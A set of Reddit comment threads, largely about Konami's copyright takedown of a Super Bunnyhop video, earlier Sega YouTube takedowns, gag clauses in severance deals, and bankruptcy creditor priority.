I mean, when I was 8, I didn't give two fucks if the company who made TMNT Turtles in Time was shitty or not. There isn't anything stopping this from being true now except for the fact that these companies are spending millions and millions of dollars on games to try to reach as broad an audience as possible. This in turn means if they don't sell millions and millions of copies they are considered a flop financially. 

To be honest I would rather a game be good than worry about how amazing the graphics are =/ Hell yeah, alien isolation,  did poor because it "only" shipped 2.11 million copies, 

Yeah fuck off,  for a game that totally different from whats in (slow, minimal combat, atmospheric horror game, focus on appealing to existing fans) especially with it following the shit show that was Aliens:colonial marines,  it did really well.  That was like back when Square tried to say one of their games (I can't remember which exactly) did poorly when it sold 3m+ copies. To me if a game is selling even 2 million and isn't considered profitable then maybe something has to be changed.  It was the Tomb Raider reboot that they said that about.  That game has since gone on to do very well for them with the HD re-releases. Too much money is spent on advertising and middle-men who do nothing. Same thing that happens to every industry as it reaches past its infancy.  I feel like this is at the core of what's ailing the AAA industry right now. Great innovative games can't pay for themselves. TMNT Turtles in time wasn't shitty though!  It was a sequel and not so groundbreaking, but it was fun and popular for it.  These days Konami is just pumping out as much unplayable garbage as possible and trying to silence anyone that wants to tell you they're doing it.  

They could do very well with more fun games like they had back in the day when they owned the sidescrolling shooter and multiplayer action games... but they don't want to own, they just want to sell as much garbage as they can hide under DMCA letters.

Hell, at this point modernized sidescrolling "New Super Contra" would make a ton of money without taking forever to make, but nope, they make crap that's hard to like instead...  and get mad when people realize this truth. Quality doesn't leave enough room for profit, apparently. Maybe they should stop spending so much money making bad remakes of games nobody asked for and bad HD ports =P I like that they talk about diminishing sales, yet the franchise exclusive to one console.  Did that arrangement make up for lost sales?

Like others have said, I think they are using that as an excuse to get out of the business. It really does seem like they just want to get out of the gaming business for whatever reason. I just can't fathom any other reason considering how good most of their games used to be. Games aren't profitable, compared to the emerging markets they're trying to get in to (like gambling machines, if Japan decides to legalize them). And according to Jim, nothing changed with the blacklist, because they always forgot to send him review copies of the game either way. [Here's last weeks' Jimquisition, which discussed these things](https://www.youtube.com/watch?v=ynl4sIFazmM) It's funny because in the latest video he posted today he mentioned "Pretty soon they will be issuing DMCA for PT videos." Then this happens today. Pretty sad to see Konami taking this route =/ SEGA (of Japan) issued YouTube takedowns on Shining Force videos (including videos that had no actual game footage, such as 100%-webcam vlogs) to try to improve the search ranking for certain Shining Force videos put out by SEGA. A move that has John Bain (TotalBiscuit) boycotting them to this day.

(Also witness Nintendo's draconian YouTube policies in contrast to every other decent AAA company's.)

So that's three Japanese companies who are dickbags (bags of dicks) about video-form commentary and critique, or videos in general. Gee...I wonder if that's a pattern. That's the kind of thing that makes me want to flood YouTube with completely unrelated videos that have Shining Force in the title and as a tag.  "The Best Kubrick movie is The Shining force all your friends to watch it." It does seem to just be Japanese companies trying this (aside from the off shoot random tiny developer that wants to stop criticism for their badly done game). They have been doing some bizarre moves in general recently this just seems to be one more  In one of the last Jimq, Jim commented that they expected their games to get better reviews too.  And their embargo does't even really affect Jim, because Konami's shitty marketing department rarely send review copies out on time and Jim has been already buying his own games to review. What exactly is a lifetime gag order? It doesn't sound very legal to me.  "It is an order, typically a legal order by a court or government, restricting information or comment from being made public, or in some cases, passed onto any unauthorized third party. The phrase may sometimes be used of a private order by an employer or other institution."

Basically, they couldn't talk about how Konami treated them when they were publishing Skullgirls but since they didn't sign the form (and well managed to get game back to the stores), they can actually talk about the truth. This is typically a non-disparagement agreement, where in exchange for something from the publisher (publishing their game in this case) the developers would contractually not be able to say anything negative about Konami for risk of lawsuit. 

These non-disparagement clauses work because usually the non-disparagement clause comes from the assymmetrically powerful side. The most common in the US is an employer firing an employee and attaching the non-disparagement to a severance package. In this case, it's a publisher trying to force a developer.

EDIT: typo fix, said "developers" where I meant "publishers" Happily did not sign mine when they laid us all off. Their severance package was pitiful to begin with. I honestly wonder how enforcable such clauses are (specifically the "you're not allowed to be negative" bits). It's questionable, but certainly can have teeth if you make your criticisms openly public as opposed to just badmouthing them over dinner. 

There's actually a federal bill being proposed right now to make these clauses unenforceable. I'm a big fan, personally.

The ones I've seen don't say "you're not allowed to be negative", they actually say that both you and the company may not say anything other than to confirm that you worked there and were in good standing. So the gag claus applies to the company too, it's just that the company typically won't care if it's prevented from giving you a good or bad reference. While we're at it, let's get rid of those non-compete clauses that can be written with no expiration date as part of *severance agreements*. My friends in the legal field tell me that these are almost unenforceable, but that doesn't mean they're not a headache or that they don't intimidate people.  Disclaimer: IANAL

It depends on the country/state and the nature of the restriction. 

http://www.mayerbrown.com/Global-Guide-to-Restrictive-Covenants/ has a pretty good overview of these kinds of restrictions with breakdowns for many individual countries. (The relevant pdf is http://www.mayerbrown.com/files/uploads/Documents/Guide%20to%20Restrictive%20Covenants/MAYERBROWN_RESTRICTIVE_COVENANTS.pdf) Non-compete clauses are generally unenforceable if they are not reasonable and justifiable based on metrics of time and geography.

In other words, a non-compete clause cannot be for a significant period of time, nor a broad geographic region.  One to two years can be justified and reasonable.  But you cannot tell a person that they cannot practice their given trade for ten years (people need a way to make money.).  A non-compete within a given city or county is reasonable, but across the entire US would be unreasonable.  

 &gt;  So the gag claus applies to the company too, it's just that the company typically won't care if it's prevented from giving you a good or bad reference.

Technically this is already in place just nearly impossible to enforce.  When a company contacts an old employer, 'technically' they can only say when you started, when you left, and possibly how often you were late, called off, very factual things like that.  Not sure about the last part.  Anything more can get them sued for slander IF you can prove that it was the reason you were not hired but that is a very big if since the proof is on you prove it was a reason not on them to prove it wasn't.  probably isnt it would have likely been in actuallity an NDA which I believe might not have the same laws. It's just a clause in a contract. You break the clause, you break the contract. If you break a gag order that doesn't make you a criminal - just subject to the penalties of breaking your contract. [deleted] can we get a possible mirror link so we can see what the original video was? Mirror from the neogaf thread: http://m.neogaf.com/showthread.php?t=1044229

Youtube Mirror: https://youtube.com/watch?v=YNSVhbsJyDQ

Dropbox Link: https://www.dropbox.com/s/cbyvrrfyx1mp13i/Kojima%20vs.%20Konami%20An%20Investigation.mp4?dl=0 just a reminder to people who see superbunnyhop for the first time because of this thread - he makes a TON of *really well thought out* gaming videos. i definitely recommend checking out [his channel,](https://www.youtube.com/user/bunnyhopshow) it's really good stuff. Wow, he does put out some good stuff. I just watched [this](https://www.youtube.com/watch?v=emW15aLYbp4) video summing up the Valve paid mods fiasco from a coupe weeks ago, and it was a very well thought out synopsis of what happened. I started watching his stuff after this report and his stuff is real good. Well written, thought out, interesting perspectives (ie: how he didn't enjoy Spec Ops: The line but thinks it's a good game). I was for the paid mod stuff (in abstract) but he changed my mind with a slight different perspective. He hooked me with his Metal Gear Solid 2 and post-modernism video. That video is fucking awesome I love his videos and he is possibly one of the only people that can make so much sense out of MGS.  His intelligence and enthusiasm are obvious. The ONLY gripe I have is that sometimes he pronounces words a little funny. Like he has only read them and never heard it said out loud.  In "comparishun". The comparison with the ideals and the shortcomings thereof with Rapture was so perfect.  He's probably the only time 'game' and 'journalism' could be used together without busting out laughing Probably because he has an actual journalism degree. 

And avoids click baity topics/rumors/baseless speculation that all the other "games journalist" partake in. Does he have a Patreon or something? I would like to support him a bit more than usual if possible.  Thank you! While I liked the video, I can't help but feel that the presentation could have been greatly improved by just putting it together into a written format with pictures. I'm not a fan of "articles" being dictated orally to the background of images not necessarily important for the content. Especially when they're DMCA'd for the irrelevant images and stuff going on in the background. It is also back up as of this comment. What grounds for copyright infringement could there have been anyways?  [deleted] Yup, they have to do it this way because Youtube's system is not a TRUE DMCA claim to start with.

The initial DMCA claim is just a private matter with Youtube. If contested, the claimant has to either rescind the claim or file a real DMCA claim in court.

That's why so many of these takedowns are reversed after a few weeks. If they weren't, the offenders would be in actual violation of the law. That and a lot of them are "fakedowns", people posing as the company or authority. And that's largely an unfortunate result of the Viacom lawsuit. &gt; YouTube's the one with the "shoot first, question later

Groin stab first, remove knife weeks later. And in the meantime, he loses revenue. IINAL, but I wonder if he has a case to sue for damages (whether he can afford to do so is another story.) I think it had footage of P.T. from what people are saying? Grounds are shaky (and bullshit) as fuck. Note to self in case I ever want to make a video go viral: Include footage that may or may not infringe copyright from a stupid company. You have to be big enough that the company notices you in the first place though. Calling it shaky is even too much. Konmai has zero grounds for citing copyright infringement considering Super Bunnyhop's usage of PT footages falls entirely under fair usage laws. &gt; What grounds for copyright infringement could there have been anyways?

There aren't any.  Fair Use laws in the United States *expressly* cover the re-use of copyrighted works for the purpose of analysis and discussion. A lot of the time on Youtube when a company files an infringement claim it is taken down regardless and it is the Youtuber's problem then to fight to prove that it wasn't.   Seriously, what the fuck is going on at Konami at this point? It's like they're trying to memory hole the entirety of their involvement in the gaming industry. They're leaving the industry, simple as that.  Yeah it really seems that way, but it still seems like they are going about it weirdly. If theyre just trying to back out of the gaming industry, why would they go to the entire metal gear backlog and pull kojimas name off it? Granted they reinstated it after public backlash, but still. Yeah, it seems like Konami is going out of their way to agitate people. Why not just quietly release (or cancel, if needed) their current games and make a formal announcement at some point that they are, in fact, leaving the industry to focus on other areas. I kbow theyre at least pulling through with phantom pain. But yeah, i dont see why they arent being more professional about this. It seems like some of the higherups are personally upset with kojima, and are intentionally trying to spite him Haha if they didn't go through with The Phantom Pain I would cry myself to sleep multiple times haha [Hahahaha.. ha....... ha](http://i.imgur.com/daIN2S4.jpg)

MML3 being cancelled I could understand, because it was extremely early in development and it wouldn't have been the best business decision for Capcom to release it (according to them, which I'll give them the benefit of the doubt about). But MGSV? After so long in development? Literally 4 months from release? I don't think I could mentally handle it. I'd be liable to protest or something. I dont know what id do haha. GZ would be a worse tease than pt though Or, like, sell off the gaming segment to another company so they can continue, and Konami makes money...? There was talk of an extremely bitter power struggle at Konami, one which Kojima lost, and this could be a case of the winner trying to twist the knife and show Kojima who is boss. I know about the struggle, but it just seems damn near chlidish to do something like that. Itd be like re-releasing all the alien movies but pulling ridley scotts name off them, just because they wanna make a new one without ridley scott. Even if it sounds ignorant, Japanese companies are just fucking mental! At least the big ones in the entertainment industry. Weirdly. I suppose that's one word for it. Its... more prudent of them than I'd expect.

See rather than explosively cancel all release and completely pull out what they're doing is dialing things down slowly. Soon, I expect, all we'll see from Konami for the non-mobile market is nothing but sequel after sequel because that's safe. That's a guarantee at making money.  [deleted] [deleted] [deleted] Wouldn't it be a better option for them to sell the digital entertainment part to a different company?  It's not doing as well as they use to, but it's not like they're losing money from what I understand. Because they are going to leverage their ip by turning them into gambling machines like they already did with contra and other classics.

They are going to whore out Metal Gear and Castlevania for years to come at pachinko parlours and casinos. :( There has to be an easier way to leave the industry than this though right? What I don't understand is while I love Superbunnyhop's videos the Konami video wasn't really viral. The dude only has 100K subscribers (which is criminal if you ask me he deserves so much more) so why the takedown? Who actually thought this was a threat or harming Konami's image? If anything now more people are going to hear about this and try and find mirror links and hell maybe get George more attention than he ever would have gotten. I just don't understand whoever filed the takedown what they were thinking? If the video had views in the millions maybe I would understand but from what I remember the video wasn't as viral as it should have been.  The funny thing is that since the DMCA, it will attract more people to watch the video than before. In this day and age, I don't understand people that think this sort of crowd control works Youtube should have a link to: http://en.wikipedia.org/wiki/Streisand_effect right before you file a DMCA with a note saying that if the DMCA is illegitimate it will attract more attention and that a DMCA is not an effective way to censor a video. This comment chain exists in every thread reporting on someone censoring content online. Usually as the top comments. Still, companies never learn.  The big companies only answer to money, if an action would cost them a lot then they would stop do it. Sadly there will never be any fines or anything for false DMCAs on youtube. They generally care about PR as well. Good PR can correlate to good sales, and vice-versa.  This is Konami we are talking about, they wouldn't know what good PR is even if it hit them in the face. Plus, if they are on their way to downplay their video game business ventures they probably wouldn't give two shits about PR. 

Metal Gear, Castlevania, Silent Hill. Just churn out shit sequel after shit sequel. The massess will eat it up. 

After all... look at CoD. Battlefield. I hope this whole thread realizes it's a self-realizing claim. So because you've heard of it and its become popular after an attempted censoring = Streisand effect is real in all cases in these kinds of attempts.

But, of course, you haven't heard of any of the times it has worked and it has been effective and something has been smothered before it reached any kind of critical mass. How many times does this form of censorship work, for the number of times we hear about it? Unfortunately, I think it may be quite effective. Where else can I watch it? I've already seen it, but if it's available elsewhere, that gives me some hope. I like his videos a lot, and I'd like to see them preserved and available to others.  https://youtube.com/watch?v=YNSVhbsJyDQ video
https://www.youtube.com/user/bunnyhopshow channel I'm actually happy that this happened because it will probably give George's channel a significant boost in publicity. I had never heard of him before, but I just subscribed and am trying to track down that video. This reminds me of when Sega did a false DMCA on Totalbiscuit when he was playing the shining force games. False DMCA is illegal and Konami should be punished for that shit but i doubt they ever will be unfortunately.  Sega DMCAed Shining Force across all of youtube shutting many channels down completely as part of a marketing campaign for their next game. I believe they wanted their trailers to be the top search results. They still have not lifted the strikes. Yeah i heard about that and Sega can go fuck itself for doing that shit. They shutdown tons of channels and probably ruined people's entire youtube careers just for some marketing campaign bullshit and they never faced any legal consequences. Even Ubisoft isn't dumb enough to do that shit and Ubisoft is a pretty corrupt company.  TB *still* refuses to mention any Sega games as a result. They were essentially blacklisted by the biggest gaming youtuber because they're idiots. He's said multiple times all they have to do is apologize and he'll cover their games again, yet it's been years and still nothing.  I'll let you in on a secret: I don't think SEGA cares. Sega Japan doesn't care. The folks at Creative Assembly and Relic care but can't do anything.  Will nobody think of the second parties?!  Seriously. Relic is awesome.  It doesn't even make sense from a business perspective why Sega wouldn't apologize to TB. Sega seriously fucked TB over as well as tons of other channels so they should apologize, and focus on getting all of the channels they shut down back online. Consumers love to hear when businesses own up to their mistakes and fix the problem so they would only be good publicity for Sega plus they'd be able to get TB to cover their games again so they'd be improving their marketing as well. It makes perfect sense why Sega should Apologize and fix the problem but they refuse to do it. It's like Sega is run by a bunch of stubborn children instead of intelligent business men. &gt;when Sega did a false DMCA on Totalbiscuit

Didn't Sega do this to everyone they could, TB included? I recall Sega doing it to everyone for Shining Force. If it's enough to fill out a fucking form to take down someone's video there should also a be form for the defendant, that, if the claim was wrong, enables them to get reimbursed for missed revenue and reputational damage. I agree but unfortunately Youtube's takedown system is pretty shitty and overly favors the company doing the takedown instead of the content creators that keep youtube alive.  100K subscribers is not small.  It's not giant, but it means they are viewed regularly.  I didn't mean it as a bad thing I just meant there are other gaming channels on youtube with much more subscriptions. Case in point Totalbiscuit has over 2 million subscribers. I could see why they would take down a video if TB did it. SuperBunnyhop I felt was always underrated and a little niche.  His videos only get 50,000 views while TB's get double or triple the amount.  It's undoubtedly because he reported on someone from inside the company giving him information he shouldn't have. His source said they were about to fire a lot of people and that the business really sucked along with a bunch of other info. I cannot wait to see what Hideo Kojima will do once he is freed from Konami's utter bullshit. I made a joke with some of my gaming pals that Hideo Kojima could literally walk into any game studio in the world and sit down at a desk and begin working and no one would stop him. He is at that damn level. I wouldn't be surprised if one of the big three (Sony, MS or Nintendo) snatch him up right away for a good first party IP.
 I wouldn't be surprised if he's already hired, and just finishing all his loose ends at Konami. I hope he hangs out with Platinum Games for a bit. I'd love a Kojima-filled game in the spirit of Rising/Bayonetta. I don't think Platinum could afford him unless they had some deal lined up before he got there. He will mostly likely start his own studio though.  Probably, but you also never know; wherever/whatever Kojima's future project is, it probably won't be very hard to find a publisher for it, and a Platinum game with Kojima as director or writer would be a pretty strong pitch for various publishers, I'm sure there are a few who would be willing to help pick up the tab. he actually got a job offer from coffee stain studio's in their new goat simulator  game. I dont think it was serious and more a sign of support and admiration. I'm sure they are leaving the industry, wouldn't be surprised to see an announcement that basically says 'Guess what, series like castlevania, silent hill, metal gear,   they are all dead, you'll never see another one of these games again,' hell, i'd be surprised if they let the IP's just rot and refuse to sell them at this point just to spite us.  That's what i'm seeing from them right now Actually you can look forward to still playing those games in Slot Machine form...

[Look what happened to SNK](https://m.youtube.com/watch?v=F8P6NJ7S5ZM)

Ugh..! They already did that with [Parodius](http://thumbnail.image.rakuten.co.jp/@0_mall/a-pachislo/cabinet/01568455/parodeus.jpg) some time ago.

But hell, most of the people involved in that series are long gone anyways, I'd probably hate a new game, especially if the people who made Otomedius worked on it. That is the shittiest slot machine.  

Related note, though, Williams acquired Bally/Midway, then closed the doors to the pinball business in 1999 to focus solely on slot machines.  Sad times.  Nah. THey'll just continue to milk them all. [Even Metal Gear.](http://www.konami-digital-entertainment.co.jp/en/news/topics/2015/0320/) well you can look forward to things like Mighty No. 9 and the Castlevania "successor" on kickstarter.  It'll suck if those IPs all really die but it's better than nothing.  Might be hard to recreate Metal Gear though. I think we should all remember that, despite what Konami has been doing, they are far from dead and they don't depend on the US video game market. 

They released their 4Q earnings on Friday, and they beat analyst estimates. Their income increased 50% FY15 from FY14. Most of their increase came from mobile games. That's exactly it, they are focused in mobile and what ever the hell else. If you saw the Super Bunnyhop video, they have their fingers in many more pies than one would realise (from a video game perspective).  Yup. So even if they lose all of their US customers, they will be just fine. They're likely bailing on the video game market. Unfortunate decision for people who like their IP (Metal Gear, Castlevania, Silent Hill, etc.) but the quality of these titles aside from Metal Gear has dipped for a really long time and I don't think the IP is powerful enough to lament it as long as a spiritual successor exists.

Iga just released his [Castlevania-successor kickstarter](https://www.kickstarter.com/projects/iga/bloodstained-ritual-of-the-night), I'm sure if Kojima wants he can make a new horror game, etc.

Good riddance to be honest. Do it right or don't do it. They are dead as a console game maker, and that's all which should matter for us. The problem is that they own a lot of franchises people love. Video game IP lawyer here. I deal with DMCA takedowns on a daily basis (sending and fighting against them).

What Konami did here was incredibly stupid, shortsighted, and ineffective, but it wasn't **illegal** as some people here are suggesting. 

Konami probably didn't file a DMCA claim under the penalty of perjury. The first step with YouTube is usually just an informal copyright notice that doesn't involve any penalty of perjury or any other legal requirements. 

Furthermore, even if they did file a DMCA claim, they could probably just say that they were filing it based off of the small amount of their copyrighted content that was actually used in the video. For instance, look at the emails  at 1:06 that are technically copyrightable material. It would be a super weak claim that wouldn't hold up in court, but it would probably be enough to get past the perjury requirement.  The video also contains cutscenes and video from some games (are they Konami games?) - if so, it would be an even stronger basis for not committing perjury. 

What Konami did here was pretty stupid since it's obviously going to bring even more attention to the video (hello Streisand Effect) and will be solved by a simple youtube appeal or DMCA Counterclaim, but not illegal. 

I also wrote about YouTube's copyright takedown process for Gamasutra and how people like Super Bunnyhop can fight the claims: http://gamasutra.com/blogs/StephenMcArthur/20140624/219589/How_to_Beat_a_YouTube_ContentID_Copyright_Claim__What_every_Gamer_and_MCN_Should_Know.php
 [deleted] [deleted] [deleted] [deleted] [deleted] It's pretty easy to get a DCMA takedown notice on a video.  All you have to do is claim to be something you aren't and fill out an electronic form.  Google/Youtube does not put real eyes on any of these until there is a response filed by the person who posted the video, so for all you all may know, *I could be Konami.* And if I remember right, disputing a DMCA gives you a strike on your account if they rule against you. Either Konami is dumb enough to not remember Day One: Garrys Incident or they're hoping that DMCA'ing this sort of thing will buy them time while they burn their company to the ground.

I honestly don't know which is worse. &gt;while they burn their company to the ground.

They don't give a fuck about video games anymore and want to get out. Do you really believe a company heavily invested in completely different parts than just gaming, and according to rumors starting to profit off of the legalizing of gambling in Japan, will "burn to the ground" because of a Youtube DMCA claim? Yes, a lot of Redditors who are only familiar with how businesses operate from a high school/college student video game consumer's perspective do think that this is a the equivalent of "burning it to the ground". Wouldn't chalk it up only to redditors. A lot of YouTube commenters and even Youtubers themselves completely ignore Konami's refocus on gambling and mobile. Same sort of thing. People on Reddit aren't categorically different from other people who talk about video games online. Or they remembered SEGA which did it and never even had to appologise to the people which got the strikes on their channel. They did have to back out when the channels that had legal help fought back I don't think a lot of people take SEGA seriously anymore Several Youtubers boycotted or boycott SEGA. Though, I don't think that disproves your point. I'm doubtful it's even a significant blip on SEGA's internal statistics.  Are you really under the impression that the Garrys Incident incident made a big enough impact to people outside of relatively small internet message boards? I would almost bet no one has even heard of the game there, let alone the controversy surrounding it. And even then, to have it affect what they do as a company is even more nonsense. As an avid gamer for the last decade plus, what is the "Garrys Incident"? Short form: early access game did not deliver as promised, was called out on it, creator blew up, cue Streisand effect It did much worse than "not deliver as promised". It was one of the worst games ever made. [Heres the video totalbiscuit uploaded explaining what happened](https://www.youtube.com/watch?v=QfgoDDh4kE0)

[And heres his video that was dcma'ed by the developer](https://www.youtube.com/watch?v=KjTa_x3rbJE&amp;feature=iv&amp;src_vid=QfgoDDh4kE0&amp;annotation_id=annotation_2716921017) Getting away from gaming isn't burning your company to the ground when they make more money making Pachinko machines. Actually, what really frightens me about all this is; *this probably won't go the way of Garry's Incident at all. This has the potential to be the opposite.* 

The reason indie developers end up absolutely slaughtered when they attempt this is because they don't have a lot of money; after they issue a false DMCA takedown, the fuse of a time bomb is lit. They have to take the issue to court if they feel they are actually being infringed upon. Since they don't have the money to do that, the argument ends there, and the video comes back shortly after. We've seen this process outlined by Total Biscuit, as well as in the Jimquisition, after enough false claims were made.

Konami absolutely *does* have the money to take this to court if they want to. I'm a new viewer of Super Bunny Hop (I like him a lot, he's very smart), but I'm willing to bet he does not have the funds that Konami does.

If Konami wants this to disappear badly enough, it can. It doesn't matter whether or not whatever they claim is legal or even correct, they only need to threaten it, because random Youtube users can't afford to risk a courtroom brawl any more than an indie game developer with a stick up their ass can. What's the OP going to do about it? the one thing I can see is that SBH has a lot of friends who have bigger channels then him, the TOVG guys who have an office and works with nintendo, Jim Sterling, and TB are all people who like his work and will probably work to try and deal with it. Also Polaris is owned by Disney now, so they have a Megacorp's worth of lawyers to back them up too. &gt;...DMCA'ing this sort of thing will buy them time while they burn their company to the ground.

They are categorically not burning their company into the ground. It seems clear they will produce only 2 core video game properties going forward (MGS &amp; Pro Evolution)

They are more than a games company. Much more even; George's video covered that too. [deleted] [deleted] https://www.youtube.com/watch?v=iMK-kajdgMA

And its back.

Would you look at that. Another case of someone abusing the DMCA system and getting burned by the public. Man. Its real good that this stuff is just isolated and not a consistent trend. I'm going to take this opportunity to say that George (creator of Super Bunnyhop) makes some of the most thoughtful analyses of video games I've ever seen. He doesn't have a schtick like some other reviewers, he's just completely focused on the material of the game and does a fantastic job picking apart mechanics, as well as industry news in general.

It is too bad Konami apparently wants war with such a humble guy. [deleted] This is nuts, I bet it was because Jimquisition mentioned George in one of his videos about Konami. Konami has a big fat hate boner for Jim and probably took out George just because he was mentioned. if thats true its incredible how petty a company can be. [Here is Jim's video right after George's video came out.](https://www.youtube.com/watch?v=ynl4sIFazmM) You can decide for yourself whether you believe Jim or not, but it's the only explanation I can think of that would have brought so much scrutiny to the video on Super Bunny Hop. You know what slowly dissolving the development team and demoting the director before the release means? There will be no post-release support.

I for one will wait at least a few weeks before even thinking about buying the game. Use of the DMCA in this manner is illegal.  It really aggravates me that there are no consequences for abuse. How did the video get back up? Did Youtube help the guy out or did Konami back down? Youtube helped him. They said Konami didn't provide enough information.

https://twitter.com/superbunnyhop/status/597857120604688384 LOL only fucking Konami can be so fucking incompetent they can't even abuse a DMCA takedown properly.  [**@superbunnyhop**](https://twitter.com/superbunnyhop/)

&gt; [2015-05-11 20:13 UTC](https://twitter.com/superbunnyhop/status/597857120604688384)

&gt; Ack! Scratch that! Just got an email from YT themselves saying the strike was "missing required information." Has that ever happened before?

----

^This ^message ^was ^created ^by ^a ^bot

[^[Contact ^creator]](http://www.np.reddit.com/message/compose/?to=jasie3k&amp;amp;subject=TweetsInCommentsBot)[^[Source ^code]](https://github.com/janpetryk/reddit-bot)
 I don't get it, I'm about 2 minutes in and don't see anything Konami can claim as their own content.

Anyone know how they could do this, aside from "Youtube is shit and is 100% automatic, with no checks on validity" ? Mirror - https://www.youtube.com/watch?v=YNSVhbsJyDQ I think the DMCA system need a complete overhaul.  
Maybe once your channel surpasses a certain number of subs (like 100k?) the company has to actually provide proof before they can take down your video.  
 Wouldn't that just penalise the little guy and ensure only the big Youtubers can do what they want? It would certainly benefit the bigger youtubers, but I think the system with the immediate takedown is in place to ensure that there are no people who illegally upload entire movies etc. (it would be pretty bad if a movie is up for a few hours) and bigger channels would probably not do such a thing I don't think the takedown of Bunnyhop video was automated, or else it would have been removed way faster (like the day it was uploaded). Konami saw the thing, didn't like it and filled a complain, abusing the DCMA system, a common thing on Youtube. It's not a "DMCA" system, it's youtube's own system to comply with the DMCA.

False DMCAs have legal repercussions.

False youtube takedowns are essentially a "nyeh nyeh I blocked your video for a month until I don't respond to the objection".

There is no way in hell google could keep up if they tried to have actual people sort through things, even over 100k subscribers. This is why it's automated, if they leave something up they could be found legally responsible as well.

If people want the DMCA changed, write to your representatives, although there is little chance much will happen. Trying to remember if I watched this video and was pretty sad because I wanted to learn more about this situation.  But I did remember watching this video, especially the part about Konami's gambling division and their investment and I'm guessing lobbying for the bill that will make gambling legal in Japan.  That was a "holy shit" moment for me and just screamed shady to me in my own values, as well as hitting me personally with the whole Kojima situation.

MGS:GZ and MGS:TPP are the last games I'm getting from Konami to support Kojima and prove Konami wrong. While I don't think it's immoral for a company to exit an industry they no longer have faith in, it speaks volumes how they are going about it. 

Apparently no one ever told Konami the adage "never burn bridges"  because they seem dead set on cutting ties with nearly everyone that helped them succeed in digital entertainment. 

I really hope the Pachinko money was worth it, especially considering gambling's legality in Japan is still up in the air.  The Streisand Effect in full force.  When will these people learn? In before the Konami code is revealed as an ancient demonic prayer in a forgotten runic language that we've all been unwittingly invoking all these years. Its funny when people act like censorship can only be done by the government, when nowadays we have examples of people and corporations trying this shit all the time. Luckily the internet is leakier than a capsized titanic so it never works.

Its funny, i've heard some silly shit about the Yakuza pressuring Konami to go into gambling more, as they get a bigger cut. It sounds crazy, but then again the Yakuza are into a whole ton of shit over there. That or Kojima was going around flaunting his *big boss* too much. As the world keeps moving on, the line between corporations and government is becoming so thin as to be non-existent. [deleted] DMCA will be used to protect copyrights, they said. And now they are used to silent unpleasants opinions.  What a farce of the USA legal system. Such a shame. People like him put so much effort into their work, only for it be taken away by a damn DMCA. Wtf is wrong with them? Does anyone on YouTube even cover Konami games anymore? What little they have left anyway. Wouldn't you think that, given how businesses operate and how fast people can abandon ship as paying customers that they would see the reactions from their decisions and start course correcting? Hello Streisand effect. Konami just made this small video huge by trying to censor it. Congratulations. Konami, the fuck are you doing? You can be a business without being a whore. /u/cinemasins taught me that. You're pissing off both kojima and the internet? Are you insane? Do you just want it to end? You're not a bank, ok?  You won't be bailed out when you fuck up. Is there a summary somewhere for those of us who haven't seen the original video There's a YouTube mirror elsewhere in the comments here, I recommend watching it, and subscribing to Super Bunnyhop, its an awesome channel. Damn. I remember back in the day when Konami's little intro graphic meant that game we just loaded into the NES/SNES was going to be worth the rental price for the weekend.

Times sure have changed...
 The cynical upside of this is that since the devs are already in a legal dispute with the publisher, they've now got some pretty damning material to turn the case to their side. They could walk out of this dispute with more money from damages than if Bulkypix had paid them properly to begin with. Or the company declares bankruptcy and doesn't give them a cent sadly.

Although I doubt this would happen unless they literally have no money to pay them. I'm pretty sure if they went insolvent they'd have a legal claim to their assets. If they have any assets left, the bank is first to claim any assets to repay any debt they may have, then any other creditors. Then whatever is left can be used to pay the developer In this case, the developer *would* be a creditor, wouldn't they? Difference between secured and unsecured creditors though Also, conveniently for the publisher's executives, wages pay out first. Isn't there a cap on how much gets paid to each employee at the first round? I cannot speak for america but in France there are insurances in case of insolvability. Concerning the liquidation itself, The employees get paid in full, then the bank takes what's left, then the state etc. mmm but I thought there was some limitation on how much any given employee can get.

Something about certain web companies paying huge amounts to their CEO/Founders during the .com boom without ever actually having any revenue of any kind. Pre-filing wages have priority up to a certain limit, and excess is a non-priority claim. However, post-filing wages typically have administrative priority with no cap. &gt; Also, conveniently for the publisher's executives, wages pay out first.

This isn't true in the US.

Secured creditors get paid first (i.e. those with a lien). Then there's nondischargeable debt that follows a chain of priority. The quick and dirty rundown is as follows:

1. Domestic support (e.g. child support) and trustee's administrative expenses

2. Unsecured federal loans

3. Unsecured creditors' claims for expenses incurred after the declaration date (but before the trustee is appointed)

4. Wages, salaries, commissions

5. Contributions to an employee retirement plan

6. Unsecured claims of creditors engaged in agriculture/fishing activities

7. Deposits on unfulfilled purchases

8. Duties, taxes, penalties

9. Balances held in reserve

10. Settlements to creditors who were killed/injured by an intoxicated vehicle/vessel operator

The above cannot be discharged. If anything is left over after the above is paid, then general unsecured debt will be repaid based on whatever a particular creditor's share of the leftovers is. 

Edit: I just figured out that none of this is relevant to what's currently going on, but I'm leaving it in case anyone finds it useful/educational. That sounds like an incredibly flawed priority list. Couldn't you start a company with the express purpose of going bankrupt, and then collect whatever ridiculous salary you allotted yourself on the way out? Yes, but you would need to get funding to do so, and to show that you weren't embezzling as a result.  The priority list is intended to help the low-rank employees.  That is, the grocery clerk gets paid before the bank, because the clerk can't afford to go without in the same way that the bank can. Executives also can be held personally liable for any money owed

Very easy to get sued by a creditor/investors/watchdogs if they're in breach of pretty much anything.

Wages going out first isn't to protect CEO's from losing a fraction of their income (as I am assuming you are picturing the kind of Execs who make 3-20x their salary through bonuses, which wouldn't exist if he company in question was heading into administration) - it's to protect middle/lower rung employees. But yeah totally your sentiment of fuck fat cats who run companies is a great one. You clearly have no clue about business law,  the reason businesses are setup is to limit the liability of the owner. The executives have no liability to the company barring illegal activity. Kinda. Corporations and LLC's have limited liability, meaning the owners are only liable for what they've invested. Not all businesses are like this; sole proprietorship's owners are financially responsible for the businesses debts. That said, this company is more than likely the former. There are claims here for illegal activity, like fraud.  In any case punitive damages are non-dischargeable in bankruptcy, and the corporate veil can be pierced if necessary. You can absolutely be sued by creditors as a CEO for a whole host of reasons. Trading while insolvent is a good one, even just making bad decisions can be construed as a failure of due diligence.

My father took up as CEO of a large electricity infrastructure company owned by a merchant bank during the GFC as the old one jumped ship early. Had to deal with him potentially dealing with a shared 3 billion dollar suit as the lenders could potentially sued on the basis the company did not react quickly enough to the GFC. For 2 years our family waited for the outcome in courts, even though we were not apart of it in the slightest. Fortunately in what was the largest restructuring of a company in Australian history, things went OK.

This did not happen to it's sister company, and a good friend of ours on the board was completely bankrupted by it.

It's not necessarily about what's illegal, it's about who's responsible for the lost money.

